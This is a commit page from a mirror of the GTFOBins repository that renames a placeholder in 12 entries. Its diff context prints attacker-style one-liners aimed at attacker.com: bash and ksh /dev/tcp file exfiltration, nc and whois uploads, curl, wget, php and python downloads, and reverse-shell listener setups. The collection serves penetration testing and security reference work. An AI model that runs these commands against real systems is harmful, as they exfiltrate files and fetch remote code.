public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-25 22:40:10 +01:00
Code Issues Projects Releases Wiki Activity

Replace where_to_save with file_to_save

Browse Source
This commit is contained in:
Emilio Pinna 2018-06-04 18:53:35 +01:00
parent 6a747b0920
commit 7e5bcab249
12 changed files with 19 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
_gtfobins/bash.md
View File

@ -13,7 +13,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' bash -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345

2
_gtfobins/curl.md
View File

@ -10,6 +10,6 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
LFILE=where_to_save LFILE=file_to_save
curl $URL -o $LFILE curl $URL -o $LFILE
--- ---

2
_gtfobins/ksh.md
View File

@ -13,7 +13,7 @@ functions:
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345

4
_gtfobins/nc.md
View File

@ -1,7 +1,7 @@
--- ---
functions: functions:
upload: upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
@ -11,7 +11,7 @@ functions:
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: | code: |
LPORT=12345 LPORT=12345
LFILE=where_to_save LFILE=file_to_save
nc -l -p $LPORT > "$LFILE" nc -l -p $LPORT > "$LFILE"
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.

2
_gtfobins/php.md
View File

@ -38,7 +38,7 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.

2
_gtfobins/python2.md
View File

@ -20,7 +20,7 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.

2
_gtfobins/python3.md
View File

@ -20,7 +20,7 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.

4
_gtfobins/scp.md
View File

@ -24,13 +24,13 @@ functions:
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RPATH=user@attacker.com:~/where_to_save RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send LPATH=file_to_send
scp $LFILE $RPATH scp $LFILE $RPATH
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_get RPATH=user@attacker.com:~/file_to_get
LFILE=where_to_save LFILE=file_to_save
scp $RPATH $LFILE scp $RPATH $LFILE
--- ---

4
_gtfobins/sftp.md
View File

@ -15,11 +15,11 @@ functions:
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
put file_to_send where_to_save put file_to_send file_to_save
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
get file_to_get where_to_save get file_to_get file_to_save
--- ---

4
_gtfobins/ssh.md
View File

@ -13,13 +13,13 @@ functions:
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_get RPATH=file_to_get
LPATH=where_to_save LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH ssh $HOST "cat $RPATH" > $LPATH
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=where_to_save RPATH=file_to_save
LPATH=file_to_send LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH ssh $HOST "cat > $RPATH" < $LPATH
file-read: file-read:

2
_gtfobins/wget.md
View File

@ -10,6 +10,6 @@ functions:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=file_to_save
wget $URL -O $LFILE wget $URL -O $LFILE
--- ---

8
_gtfobins/whois.md
View File

@ -3,13 +3,13 @@ description: |
`whois` hangs waiting for the remote peer to close the socket. `whois` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
whois -h $RHOST -p $RPORT "`cat $LFILE`" whois -h $RHOST -p $RPORT "`cat $LFILE`"
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
@ -20,12 +20,12 @@ functions:
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=where_to_save LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE" whois -h $RHOST -p $RPORT > "$LFILE"
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file. - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=where_to_save LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
--- ---